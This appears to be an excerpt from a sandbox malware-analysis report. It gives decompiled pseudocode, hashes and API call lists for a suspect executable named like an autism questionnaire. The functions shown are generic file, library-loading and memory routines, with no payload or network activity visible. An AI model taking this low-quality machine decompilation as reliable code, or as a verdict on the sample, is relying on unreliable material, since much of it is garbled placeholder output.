                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileLibraryLoadModuleName
                                                                                              • String ID:
                                                                                              • API String ID: 1159719554-0
                                                                                              • Opcode ID: c89eb0a175d0b8486c29a163bc28afc1dff8206c8c77fc3926f93841ada109dc
                                                                                              • Instruction ID: c66d7809fa1512833e1e01641763b0ecb7dd00f0751393a0e64d94d028879d96
                                                                                              • Opcode Fuzzy Hash: c89eb0a175d0b8486c29a163bc28afc1dff8206c8c77fc3926f93841ada109dc
                                                                                              • Instruction Fuzzy Hash: 35116070A4421CABDB10EB55CD86BDE77B8DB04304F5144BEE508B32C1DA785F848AA9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 60%
                                                                                              			E00427154(void* __eax, void* __edx, void* __eflags) {
                                                                                              				int _v8;
                                                                                              				char _v16;
                                                                                              				long _v20;
                                                                                              				int _t13;
                                                                                              				intOrPtr _t27;
                                                                                              				void* _t32;
                                                                                              				void* _t34;
                                                                                              				intOrPtr _t35;
                                                                                              
                                                                                              				_t32 = _t34;
                                                                                              				_t35 = _t34 + 0xfffffff0;
                                                                                              				if(E00427108(__eax,  &_v16) != 0) {
                                                                                              					_push(_t32);
                                                                                              					_push(0x4271b1);
                                                                                              					_push( *[fs:eax]);
                                                                                              					 *[fs:eax] = _t35;
                                                                                              					_t13 = DeleteFileW(E004084EC(__edx)); // executed
                                                                                              					_v8 = _t13;
                                                                                              					_v20 = GetLastError();
                                                                                              					_pop(_t27);
                                                                                              					 *[fs:eax] = _t27;
                                                                                              					_push(E004271B8);
                                                                                              					return E00427144( &_v16);
                                                                                              				} else {
                                                                                              					_v8 = 0;
                                                                                              					return _v8;
                                                                                              				}
                                                                                              			}












                                                                                              APIs
                                                                                              • DeleteFileW.KERNEL32(00000000,00000000,004271B1,?,0000000D,00000000), ref: 0042718B
                                                                                              • GetLastError.KERNEL32(00000000,00000000,004271B1,?,0000000D,00000000), ref: 00427193
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: DeleteErrorFileLast
                                                                                              • String ID:
                                                                                              • API String ID: 2018770650-0
                                                                                              • Opcode ID: 6bce5fda464dbdacec63520f594f5bcb5d9fb2b97579abb83185b4526990ec2d
                                                                                              • Instruction ID: b2b9a58b343adce66678156e8009272800f6ed28378062f2bcdc1a6b1bb3db77
                                                                                              • Opcode Fuzzy Hash: 6bce5fda464dbdacec63520f594f5bcb5d9fb2b97579abb83185b4526990ec2d
                                                                                              • Instruction Fuzzy Hash: 7AF0C831B08228ABDB01EFB5AC424AEB7E8DF0971479149BBE804E3341E6395D209698
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 37%
                                                                                              			E00421230(void* __eax, void* __ebx, int __edx) {
                                                                                              				struct HINSTANCE__* _v12;
                                                                                              				int _v16;
                                                                                              				int _t4;
                                                                                              				struct HINSTANCE__* _t9;
                                                                                              				void* _t12;
                                                                                              				intOrPtr _t16;
                                                                                              				void* _t18;
                                                                                              				void* _t19;
                                                                                              				intOrPtr _t20;
                                                                                              
                                                                                              				_t18 = _t19;
                                                                                              				_t20 = _t19 + 0xfffffff4;
                                                                                              				_t12 = __eax;
                                                                                              				_t4 = SetErrorMode(__edx); // executed
                                                                                              				_v16 = _t4;
                                                                                              				_push(_t18);
                                                                                              				_push(0x4212a2);
                                                                                              				_push( *[fs:eax]);
                                                                                              				 *[fs:eax] = _t20;
                                                                                              				asm("fnstcw word [ebp-0x2]");
                                                                                              				_push(_t18);
                                                                                              				_push(0x421284);
                                                                                              				_push( *[fs:eax]);
                                                                                              				 *[fs:eax] = _t20;
                                                                                              				_t9 = LoadLibraryW(E004084EC(_t12)); // executed
                                                                                              				_v12 = _t9;
                                                                                              				_pop(_t16);
                                                                                              				 *[fs:eax] = _t16;
                                                                                              				_push(0x42128b);
                                                                                              				asm("fclex");
                                                                                              				asm("fldcw word [ebp-0x2]");
                                                                                              				return 0;
                                                                                              			}













                                                                                              APIs
                                                                                              • SetErrorMode.KERNEL32 ref: 0042123A
                                                                                              • LoadLibraryW.KERNEL32(00000000,00000000,00421284,?,00000000,004212A2), ref: 00421269
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLibraryLoadMode
                                                                                              • String ID:
                                                                                              • API String ID: 2987862817-0
                                                                                              • Opcode ID: 5d62b3fe4766baadd73c675683546c7f58e01c4ce11fe1a914dda1a55ed8f36c
                                                                                              • Instruction ID: 4174928c950a8c4d8a753a2a73b5e5f46ee32f9a8ef6f103d2b3a03bcfaff51e
                                                                                              • Opcode Fuzzy Hash: 5d62b3fe4766baadd73c675683546c7f58e01c4ce11fe1a914dda1a55ed8f36c
                                                                                              • Instruction Fuzzy Hash: 15F08270A14744BFDB115F779C5282BBAACE709B047A348BAF800F2691E53C48208574
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E004052D4() {
                                                                                              				intOrPtr _t13;
                                                                                              				intOrPtr* _t14;
                                                                                              				int _t18;
                                                                                              				intOrPtr* _t23;
                                                                                              				void* _t25;
                                                                                              				void* _t26;
                                                                                              				void* _t28;
                                                                                              				void* _t31;
                                                                                              
                                                                                              				_t28 =  *0x004BBADC;
                                                                                              				while(_t28 != 0x4bbad8) {
                                                                                              					_t2 = _t28 + 4; // 0x4bbad8
                                                                                              					VirtualFree(_t28, 0, 0x8000); // executed
                                                                                              					_t28 =  *_t2;
                                                                                              				}
                                                                                              				_t25 = 0x37;
                                                                                              				_t13 = 0x4b7080;
                                                                                              				do {
                                                                                              					 *((intOrPtr*)(_t13 + 0xc)) = _t13;
                                                                                              					 *((intOrPtr*)(_t13 + 8)) = _t13;
                                                                                              					 *((intOrPtr*)(_t13 + 0x10)) = 1;
                                                                                              					 *((intOrPtr*)(_t13 + 0x14)) = 0;
                                                                                              					_t13 = _t13 + 0x20;
                                                                                              					_t25 = _t25 - 1;
                                                                                              				} while (_t25 != 0);
                                                                                              				 *0x4bbad8 = 0x4bbad8;
                                                                                              				 *0x004BBADC = 0x4bbad8;
                                                                                              				_t26 = 0x400;
                                                                                              				_t23 = 0x4bbb78;
                                                                                              				do {
                                                                                              					_t14 = _t23;
                                                                                              					 *_t14 = _t14;
                                                                                              					_t8 = _t14 + 4; // 0x4bbb78
                                                                                              					 *_t8 = _t14;
                                                                                              					_t23 = _t23 + 8;
                                                                                              					_t26 = _t26 - 1;
                                                                                              				} while (_t26 != 0);
                                                                                              				 *0x4bbaf4 = 0;
                                                                                              				E00405884(0x4bbaf8, 0x80);
                                                                                              				_t18 = 0;
                                                                                              				 *0x4bbaf0 = 0;
                                                                                              				_t31 =  *0x004BDB80;
                                                                                              				while(_t31 != 0x4bdb7c) {
                                                                                              					_t10 = _t31 + 4; // 0x4bdb7c
                                                                                              					_t18 = VirtualFree(_t31, 0, 0x8000);
                                                                                              					_t31 =  *_t10;
                                                                                              				}
                                                                                              				 *0x4bdb7c = 0x4bdb7c;
                                                                                              				 *0x004BDB80 = 0x4bdb7c;
                                                                                              				return _t18;
                                                                                              			}












                                                                                              APIs
                                                                                              • VirtualFree.KERNEL32(004BBAD8,00000000,00008000,?,?,?,?,004053D4,0040CB76,00000000,0040CB94), ref: 004052F2
                                                                                              • VirtualFree.KERNEL32(004BDB7C,00000000,00008000,004BBAD8,00000000,00008000,?,?,?,?,004053D4,0040CB76,00000000,0040CB94), ref: 0040536E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 1263568516-0
                                                                                              • Opcode ID: 2ac254642d4a9788115c799da738c06d3b344f11962515fad3d8dec7c1c1ac76
                                                                                              • Instruction ID: 8dfda0fc8014d777c4f42bdf36328f4fb77b4e1ecbcf9529c7d2d9386e1eba40
                                                                                              • Opcode Fuzzy Hash: 2ac254642d4a9788115c799da738c06d3b344f11962515fad3d8dec7c1c1ac76
                                                                                              • Instruction Fuzzy Hash: A5116D71A046008FC7689F199840B67BBE4EB88754F15C0BFE549EB791D7B8AC018F9C
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E004232EC(long __eax, void* __edx) {
                                                                                              				short _v2052;
                                                                                              				signed int _t7;
                                                                                              				void* _t10;
                                                                                              				signed int _t16;
                                                                                              				void* _t17;
                                                                                              
                                                                                              				_t10 = __edx;
                                                                                              				_t7 = FormatMessageW(0x3200, 0, __eax, 0,  &_v2052, 0x400, 0); // executed
                                                                                              				while(_t7 > 0) {
                                                                                              					_t16 =  *(_t17 + _t7 * 2 - 2) & 0x0000ffff;
                                                                                              					if(_t16 <= 0x20) {
                                                                                              						L1:
                                                                                              						_t7 = _t7 - 1;
                                                                                              						__eflags = _t7;
                                                                                              						continue;
                                                                                              					} else {
                                                                                              						_t20 = _t16 - 0x2e;
                                                                                              						if(_t16 == 0x2e) {
                                                                                              							goto L1;
                                                                                              						}
                                                                                              					}
                                                                                              					break;
                                                                                              				}
                                                                                              				return E00407BA8(_t10, _t7, _t17, _t20);
                                                                                              			}









                                                                                              APIs
                                                                                              • FormatMessageW.KERNEL32(00003200,00000000,00000000,00000000,?,00000400,00000000,00000000,00423C1E,00000000,00423C6F,?,00423E28), ref: 0042330B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: FormatMessage
                                                                                              • String ID:
                                                                                              • API String ID: 1306739567-0
                                                                                              • Opcode ID: 8c28d4cd2feba8420b72e2c8323dac74420019247290cbce7f55a68a80108edc
                                                                                              • Instruction ID: 75fedbff241bec6efc8727d26b236f8c34027f11b3bdd8370f626a5f6d270aaf
                                                                                              • Opcode Fuzzy Hash: 8c28d4cd2feba8420b72e2c8323dac74420019247290cbce7f55a68a80108edc
                                                                                              • Instruction Fuzzy Hash: 89E0D86075432121F624A9052C03B7B2129A7C0B12FE084367A80DE3D5DEADAF55525E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 31%
                                                                                              			E00422A18(void* __eax, void* __ebx, void* __ecx, void* __eflags) {
                                                                                              				char _v8;
                                                                                              				intOrPtr _t21;
                                                                                              				intOrPtr _t24;
                                                                                              
                                                                                              				_push(0);
                                                                                              				_push(_t24);
                                                                                              				_push(0x422a5e);
                                                                                              				_push( *[fs:eax]);
                                                                                              				 *[fs:eax] = _t24;
                                                                                              				E004229AC(__eax, __ecx,  &_v8, __eflags);
                                                                                              				GetFileAttributesW(E004084EC(_v8)); // executed
                                                                                              				_pop(_t21);
                                                                                              				 *[fs:eax] = _t21;
                                                                                              				_push(E00422A65);
                                                                                              				return E00407A20( &_v8);
                                                                                              			}







                                                                                              APIs
                                                                                              • GetFileAttributesW.KERNEL32(00000000,00000000,00422A5E,?,?,00000000,?,00422A71,00422DE2,00000000,00422E27,?,?,00000000,00000000), ref: 00422A41
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: AttributesFile
                                                                                              • String ID:
                                                                                              • API String ID: 3188754299-0
                                                                                              • Opcode ID: 8cd9a521966ca01502d57987e2d96a70fbf8ec2bcb71e07358b87aea606a80f7
                                                                                              • Instruction ID: ce0c41168f735205187e46b6c3e9294348714fcf51f30dd0002a5427be662740
                                                                                              • Opcode Fuzzy Hash: 8cd9a521966ca01502d57987e2d96a70fbf8ec2bcb71e07358b87aea606a80f7
                                                                                              • Instruction Fuzzy Hash: D7E09231704308BBD721EB76DE9291AB7ECD788700BA14876B500E7682E6B86E108418
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E00423DA8(signed int __ecx, void* __edx, signed char _a4, signed char _a8) {
                                                                                              				void* _t17;
                                                                                              
                                                                                              				_t17 = CreateFileW(E004084EC(__edx),  *(0x4b92e0 + (_a8 & 0x000000ff) * 4),  *(0x4b92ec + (_a4 & 0x000000ff) * 4), 0,  *(0x4b92fc + (__ecx & 0x000000ff) * 4), 0x80, 0); // executed
                                                                                              				return _t17;
                                                                                              			}





                                                                                              APIs
                                                                                              • CreateFileW.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 00423DE5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID:
                                                                                              • API String ID: 823142352-0
                                                                                              • Opcode ID: dd9159e21b70a0e7bcb8d3c3b5b03a1c2ffc365921e6ade8a7c7864e99aae5ed
                                                                                              • Instruction ID: 37fe8146f2431012b4276926014d9d5fd10bf57e8855788e2bc853c5fce69268
                                                                                              • Opcode Fuzzy Hash: dd9159e21b70a0e7bcb8d3c3b5b03a1c2ffc365921e6ade8a7c7864e99aae5ed
                                                                                              • Instruction Fuzzy Hash: 81E048716441283FD6149ADE7C91F76779C9709754F404563F684D7281C4A59D1086FC
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E00409FA8(void* __eax) {
                                                                                              				short _v532;
                                                                                              				void* __ebx;
                                                                                              				void* __esi;
                                                                                              				intOrPtr _t14;
                                                                                              				void* _t16;
                                                                                              				void* _t18;
                                                                                              				void* _t19;
                                                                                              				intOrPtr _t20;
                                                                                              				void* _t21;
                                                                                              
                                                                                              				_t16 = __eax;
                                                                                              				_t22 =  *((intOrPtr*)(__eax + 0x10));
                                                                                              				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
                                                                                              					GetModuleFileNameW( *(__eax + 4),  &_v532, 0x20a);
                                                                                              					_t14 = E0040B234(_t21, _t16, _t18, _t19, _t22); // executed
                                                                                              					_t20 = _t14;
                                                                                              					 *((intOrPtr*)(_t16 + 0x10)) = _t20;
                                                                                              					if(_t20 == 0) {
                                                                                              						 *((intOrPtr*)(_t16 + 0x10)) =  *((intOrPtr*)(_t16 + 4));
                                                                                              					}
                                                                                              				}
                                                                                              				return  *((intOrPtr*)(_t16 + 0x10));
                                                                                              			}













                                                                                              APIs
                                                                                              • GetModuleFileNameW.KERNEL32(?,?,0000020A), ref: 00409FC6
                                                                                                • Part of subcall function 0040B234: GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040B2EE,?,?,00000000), ref: 0040B270
                                                                                                • Part of subcall function 0040B234: LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040B2EE,?,?,00000000), ref: 0040B2C1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileModuleName$LibraryLoad
                                                                                              • String ID:
                                                                                              • API String ID: 4113206344-0
                                                                                              • Opcode ID: 2301add7ea149dd4fbebfdf59b7b3942b6e3d1df22e9777a155c308e994de31e
                                                                                              • Instruction ID: 1beb63cefa55d3dba2b36e2095187d50c135a0cf4330adb642bee8d6847d8901
                                                                                              • Opcode Fuzzy Hash: 2301add7ea149dd4fbebfdf59b7b3942b6e3d1df22e9777a155c308e994de31e
                                                                                              • Instruction Fuzzy Hash: 7BE0C971A013119BCB10DE58C8C5A4A3798AB08754F044AA6AD24DF387D3B5DD1487D5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E00423ED8(intOrPtr* __eax) {
                                                                                              				int _t4;
                                                                                              				intOrPtr* _t7;
                                                                                              
                                                                                              				_t7 = __eax;
                                                                                              				_t4 = SetEndOfFile( *(__eax + 4)); // executed
                                                                                              				if(_t4 == 0) {
                                                                                              					return E00423CAC( *_t7);
                                                                                              				}
                                                                                              				return _t4;
                                                                                              			}






                                                                                              APIs
                                                                                              • SetEndOfFile.KERNEL32(?,7FB50010,004B6358,00000000), ref: 00423EDF
                                                                                                • Part of subcall function 00423CAC: GetLastError.KERNEL32(004237FC,00423D4F,?,?,00000000,?,004B5F76,00000001,00000000,00000002,00000000,004B659E,?,00000000,004B65E2), ref: 00423CAF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorFileLast
                                                                                              • String ID:
                                                                                              • API String ID: 734332943-0
                                                                                              • Opcode ID: 09339d9670a81d77462708df034512c3e9d7a5ee9c38b49a5b5d33688a33920b
                                                                                              • Instruction ID: ae15968ab9cd064c61534cde2c099b4aac4a7b80231ae1acb8e6de6fcc6ca8bf
                                                                                              • Opcode Fuzzy Hash: 09339d9670a81d77462708df034512c3e9d7a5ee9c38b49a5b5d33688a33920b
                                                                                              • Instruction Fuzzy Hash: 58C04C61300210478B04EEBBD5C190666E85B582157414466B904DB216E67DD9158615
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E0040CAA4() {
                                                                                              				intOrPtr _v16;
                                                                                              				struct _SYSTEM_INFO* _t3;
                                                                                              
                                                                                              				GetSystemInfo(_t3); // executed
                                                                                              				return _v16;
                                                                                              			}






                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: InfoSystem
                                                                                              • String ID:
                                                                                              • API String ID: 31276548-0
                                                                                              • Opcode ID: 9dd1f6b5bb1b0da35443b21aa4a452d0333aba70165927044b368234b0936b7a
                                                                                              • Instruction ID: 4f21eec972071caf62eebbeb90550a79e4d7a8082c8b53f17589c9beddeb5e45
                                                                                              • Opcode Fuzzy Hash: 9dd1f6b5bb1b0da35443b21aa4a452d0333aba70165927044b368234b0936b7a
                                                                                              • Instruction Fuzzy Hash: CDA012984088002AC404AB194C4340F39C819C1114FC40224745CB62C2E61D866403DB
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E00403BCC(signed int __eax) {
                                                                                              				void* _t4;
                                                                                              				intOrPtr _t7;
                                                                                              				signed int _t8;
                                                                                              				void** _t10;
                                                                                              				void* _t12;
                                                                                              				void* _t14;
                                                                                              
                                                                                              				_t8 = __eax;
                                                                                              				E00403B60(__eax);
                                                                                              				_t4 = VirtualAlloc(0, 0x13fff0, 0x1000, 4); // executed
                                                                                              				if(_t4 == 0) {
                                                                                              					 *0x4bbaf0 = 0;
                                                                                              					return 0;
                                                                                              				} else {
                                                                                              					_t10 =  *0x4bbadc; // 0x4bbad8
                                                                                              					_t14 = _t4;
                                                                                              					 *_t14 = 0x4bbad8;
                                                                                              					 *0x4bbadc = _t4;
                                                                                              					 *(_t14 + 4) = _t10;
                                                                                              					 *_t10 = _t4;
                                                                                              					_t12 = _t14 + 0x13fff0;
                                                                                              					 *((intOrPtr*)(_t12 - 4)) = 2;
                                                                                              					 *0x4bbaf0 = 0x13ffe0 - _t8;
                                                                                              					_t7 = _t12 - _t8;
                                                                                              					 *0x4bbaec = _t7;
                                                                                              					 *(_t7 - 4) = _t8 | 0x00000002;
                                                                                              					return _t7;
                                                                                              				}
                                                                                              			}










                                                                                              APIs
                                                                                              • VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,?,000001A3,004041E3,000000FF,00404788,00000000,0040BBE7,00000000,0040C0F5,00000000,0040C3B7,00000000), ref: 00403BE3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 4275171209-0
                                                                                              • Opcode ID: cb8f292e3956ad7a1a5e0c92f19b435d8be5366ce3ed5ca5418bf36ecf0e0e1a
                                                                                              • Instruction ID: ee114c9f451a66722181258b66a673b4223530c98f306d9f720d31c7abdd50f3
                                                                                              • Opcode Fuzzy Hash: cb8f292e3956ad7a1a5e0c92f19b435d8be5366ce3ed5ca5418bf36ecf0e0e1a
                                                                                              • Instruction Fuzzy Hash: 71F087F2F002404FE7249F799D40742BAE8E709315B10827EE908EB799E7F488018B88
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 96%
                                                                                              			E00403CF6(void* __eax) {
                                                                                              				struct _MEMORY_BASIC_INFORMATION _v44;
                                                                                              				void* _v48;
                                                                                              				void* _t13;
                                                                                              				int _t20;
                                                                                              				void* _t22;
                                                                                              				signed int _t26;
                                                                                              				signed int _t29;
                                                                                              				signed int _t30;
                                                                                              				void* _t34;
                                                                                              				intOrPtr _t35;
                                                                                              				signed int _t39;
                                                                                              				void* _t41;
                                                                                              				void* _t42;
                                                                                              
                                                                                              				_push(_t29);
                                                                                              				_t42 = _t41 + 0xffffffdc;
                                                                                              				_t34 = __eax - 0x10;
                                                                                              				E00403C48();
                                                                                              				_t13 = _t34;
                                                                                              				 *_t42 =  *_t13;
                                                                                              				_v48 =  *((intOrPtr*)(_t13 + 4));
                                                                                              				_t26 =  *(_t13 + 0xc);
                                                                                              				if((_t26 & 0x00000008) != 0) {
                                                                                              					_t22 = _t34;
                                                                                              					_t39 = _t26 & 0xfffffff0;
                                                                                              					_t30 = 0;
                                                                                              					while(1) {
                                                                                              						VirtualQuery(_t22,  &_v44, 0x1c);
                                                                                              						if(VirtualFree(_t22, 0, 0x8000) == 0) {
                                                                                              							break;
                                                                                              						}
                                                                                              						_t35 = _v44.RegionSize;
                                                                                              						if(_t39 > _t35) {
                                                                                              							_t39 = _t39 - _t35;
                                                                                              							_t22 = _t22 + _t35;
                                                                                              							continue;
                                                                                              						}
                                                                                              						goto L10;
                                                                                              					}
                                                                                              					_t30 = _t30 | 0xffffffff;
                                                                                              				} else {
                                                                                              					_t20 = VirtualFree(_t34, 0, 0x8000); // executed
                                                                                              					if(_t20 == 0) {
                                                                                              						_t30 = _t29 | 0xffffffff;
                                                                                              					} else {
                                                                                              						_t30 = 0;
                                                                                              					}
                                                                                              				}
                                                                                              				L10:
                                                                                              				if(_t30 == 0) {
                                                                                              					 *_v48 =  *_t42;
                                                                                              					 *( *_t42 + 4) = _v48;
                                                                                              				}
                                                                                              				 *0x4bdb78 = 0;
                                                                                              				return _t30;
                                                                                              			}

















                                                                                              APIs
                                                                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00403D27
                                                                                              • VirtualQuery.KERNEL32(?,?,0000001C), ref: 00403D4A
                                                                                              • VirtualFree.KERNEL32(?,00000000,00008000,?,?,0000001C), ref: 00403D57
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
